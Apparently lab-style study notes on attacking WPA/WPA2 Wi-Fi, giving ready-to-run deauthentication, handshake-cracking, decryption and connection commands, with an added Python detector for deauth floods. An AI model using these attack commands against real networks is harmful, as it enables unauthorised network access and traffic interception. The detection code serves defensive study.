WPA/ WPA2

If 802.11w is in use you can't deauth clients; you have to wait until one connects on its own.

Deauth Attack:

The attack requires multiple terminal windows.

Window 1:

# start listening and recording traffic
airodump-ng --bssid 30:46:9A:FC:53:C8 -c 2 -w wpa wlan0mon

Window 2:

# deauth specific client traffic: 
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 -h B8:2A:A9:56:95:C8 wlan0mon
# deauth all traffic: 
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 wlan0mon
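Added example (not part of the original notes): a small detector for the deauth flood the commands above produce. It parses raw 802.11 frames (radiotap header already stripped), counts unprotected deauthentication frames per BSSID in a sliding time window, and ignores frames carrying the Protected flag, which is what 802.11w gives management frames. The sample capture is constructed in memory; the MAC addresses are reused from the notes above and the threshold/window values are assumptions.

```python
import struct
from collections import defaultdict

MGMT, DEAUTH = 0, 12        # 802.11 type 0 (management), subtype 12 (deauthentication)
FLAG_PROTECTED = 0x40       # frame-control flag set on PMF-protected (802.11w) management frames

def parse_80211(frame):
    """Parse the 24-byte MAC header of a raw 802.11 frame (radiotap already stripped)."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    rec = {"type": (fc0 >> 2) & 0x3, "subtype": fc0 >> 4,
           "protected": bool(fc1 & FLAG_PROTECTED),
           "dst": frame[4:10].hex(":"), "src": frame[10:16].hex(":"), "bssid": frame[16:22].hex(":")}
    if rec["type"] == MGMT and rec["subtype"] == DEAUTH and len(frame) >= 26:
        rec["reason"] = struct.unpack("<H", frame[24:26])[0]   # little-endian reason code
    return rec

def find_deauth_floods(frames, threshold=10, window=1.0):
    """frames: iterable of (timestamp, raw_frame). Returns {bssid: peak} for each BSSID
    seen with >= threshold unprotected deauth frames inside some window-second span."""
    times = defaultdict(list)
    for ts, raw in frames:
        rec = parse_80211(raw)
        if rec and rec["type"] == MGMT and rec["subtype"] == DEAUTH and not rec["protected"]:
            times[rec["bssid"]].append(ts)
    floods = {}
    for bssid, ts_list in times.items():
        ts_list.sort()
        peak, start = 0, 0
        for end, t in enumerate(ts_list):        # sliding window over sorted timestamps
            while t - ts_list[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            floods[bssid] = peak
    return floods

def build_deauth(bssid, dst, reason=7, protected=False):
    """In-memory deauth frame, used only to construct the sample capture below."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    fc = bytes([(DEAUTH << 4) | (MGMT << 2), FLAG_PROTECTED if protected else 0])
    return fc + b"\x00\x00" + mac(dst) + mac(bssid) + mac(bssid) + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample: a burst of broadcast deauths spoofing the AP from the notes, one ordinary
# deauth from another AP, and one PMF-protected deauth (which the detector ignores).
AP, OTHER_AP, CLIENT = "30:46:9a:fc:53:c8", "34:08:04:09:3d:38", "b8:2a:a9:56:95:c8"
SAMPLE = [(i * 0.02, build_deauth(AP, "ff:ff:ff:ff:ff:ff")) for i in range(25)]
SAMPLE += [(3.0, build_deauth(OTHER_AP, CLIENT, reason=3)), (3.5, build_deauth(AP, CLIENT, protected=True))]
print(find_deauth_floods(SAMPLE))   # {'30:46:9a:fc:53:c8': 25}
```

To run it on a real capture, feed (timestamp, frame) pairs from a monitor-mode pcap after stripping the radiotap header.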

Crack:

# Hashcat
hcxpcapngtool -o wpa.hc22000 wpa-01.cap
hashcat -m 22000 wpa.hc22000 /usr/share/wordlist.txt

# Aircrack-ng (works on the raw capture, not the hc22000 file)
aircrack-ng wpa-01.cap -w /usr/share/wordlist.txt

We can confirm the recovered key is correct by using 'airdecap-ng' to decrypt the captured packets:

airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap

Connect by creating a wpa.conf file:

network={
    ssid="SWCC"
    scan_ssid=1
    key_mgmt=WPA-PSK
    psk="chameleon"
}

Use wpa_supplicant to connect to the wireless network:

sudo wpa_supplicant -Dnl80211 -iwlan0 -c ./wpa.conf
